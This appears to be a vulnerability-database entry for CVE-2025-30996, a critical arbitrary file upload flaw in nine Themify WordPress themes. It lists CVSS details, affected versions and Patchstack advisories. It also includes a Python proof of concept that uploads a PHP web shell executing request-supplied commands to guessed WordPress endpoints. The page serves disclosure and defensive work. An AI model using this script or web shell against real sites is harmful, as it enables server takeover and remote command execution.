Security Vulnerability Report
CVE-2025-30996 CVSS 9.9 CRITICAL

Published: 2026-01-06 21:15:43
Last Modified: 2026-04-28 19:30:53

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Sidepane WordPress Theme, Themify Themify Newsy, Themify Themify Folo, Themify Themify Edmin, Themify Bloggie, Themify Photobox, Themify Wigi, Themify Rezo, Themify Slide allows Upload a Web Shell to a Web Server. This issue affects Themify Sidepane WordPress Theme: from n/a through 1.9.8; Themify Newsy: from n/a through 1.9.9; Themify Folo: from n/a through 1.9.6; Themify Edmin: from n/a through 2.0.0; Bloggie: from n/a through 2.0.8; Photobox: from n/a through 2.0.1; Wigi: from n/a through 2.0.1; Rezo: from n/a through 1.9.7; Slide: from n/a through 1.7.5.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

Themify Sidepane WordPress Theme < 1.9.9
Themify Newsy < 1.9.10
Themify Folo < 1.9.7
Themify Edmin < 2.0.1
Themify Bloggie < 2.0.9
Themify Photobox < 2.0.2
Themify Wigi < 2.0.2
Themify Rezo < 1.9.8
Themify Slide < 1.7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-30996 PoC - Arbitrary File Upload in Themify WordPress Themes
# Target: Themify themes with vulnerable file upload functionality

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'

# Web Shell content - basic PHP backdoor
web_shell = '''<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    die;
}
?>'''

# Construct multipart form data for file upload
files = {
    'file': ('shell.php', web_shell, 'application/x-php')
}

# Try common upload endpoints
endpoints = [
    '/wp-admin/admin-ajax.php',
    '/wp-admin/admin.php',
    '/wp-content/themes/*/includes/upload.php',
]

print(f'[*] Testing CVE-2025-30996 on {target_url}')

for endpoint in endpoints:
    url = target_url.rstrip('/') + endpoint
    try:
        response = requests.post(url, files=files, timeout=10)
        if response.status_code == 200:
            print(f'[+] Possible upload success at: {url}')
            print(f'[+] Response: {response.text[:200]}')
    except Exception as e:
        print(f'[-] Error testing {url}: {str(e)}')

print('[*] Note: This is a simplified PoC. Actual exploitation may require authentication and specific parameter names.')
```

References

Weakness: CWE-434 (Unrestricted Upload of File with Dangerous Type)
NVD status: Deferred

Patchstack advisories (one per affected theme):

- https://patchstack.com/database/wordpress/theme/bloggie/vulnerability/wordpress-bloggie-2-0-8-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/edmin/vulnerability/wordpress-themify-edmin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/folo/vulnerability/wordpress-themify-folo-1-9-6-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/newsy/vulnerability/wordpress-themify-newsy-1-9-9-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/photobox/vulnerability/wordpress-photobox-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/rezo/vulnerability/wordpress-rezo-1-9-7-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/sidepane/vulnerability/wordpress-themify-sidepane-wordpress-theme-1-9-8-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/slide/vulnerability/wordpress-slide-1-7-5-arbitrary-file-upload-vulnerability?_s_id=cve
- https://patchstack.com/database/wordpress/theme/wigi/vulnerability/wordpress-wigi-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve